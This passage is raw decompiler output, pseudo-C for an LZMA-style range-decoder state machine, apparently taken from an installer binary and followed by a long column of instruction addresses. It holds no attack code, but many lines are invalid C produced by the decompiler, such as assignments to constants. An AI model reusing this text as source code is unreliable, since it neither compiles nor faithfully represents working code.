												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                            0x00406d5a
                                            0x00406d5a
                                            0x00406d5a
                                            0x00406d5a
                                            0x00406d60
                                            0x00406d64
                                            0x00406d68
                                            0x00406d72
                                            0x00406d80
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x0040708d
                                            0x0040708d
                                            0x00407091
                                            0x00000000
                                            0x00000000
                                            0x00407093
                                            0x0040709c
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070c5
                                            0x004070c8
                                            0x004070c8
                                            0x004070ea
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708d
                                            0x00407091
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004070ec
                                            0x004070ec
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x004071a1
                                            0x004071ab
                                            0x004071b3
                                            0x004071ba
                                            0x004071bc
                                            0x004071c3
                                            0x004071c7
                                            0x004071c7
                                            0x0040706f
                                            0x00407075
                                            0x0040707c
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x00000000
                                            0x00407087
                                            0x004070f1
                                            0x004070fe
                                            0x00407101
                                            0x0040700d
                                            0x0040700d
                                            0x0040700d
                                            0x004067a9
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x004067b8
                                            0x00000000
                                            0x004067bf
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067c9
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x00406822
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406824
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x0040686e
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406890
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x00406898
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068de
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
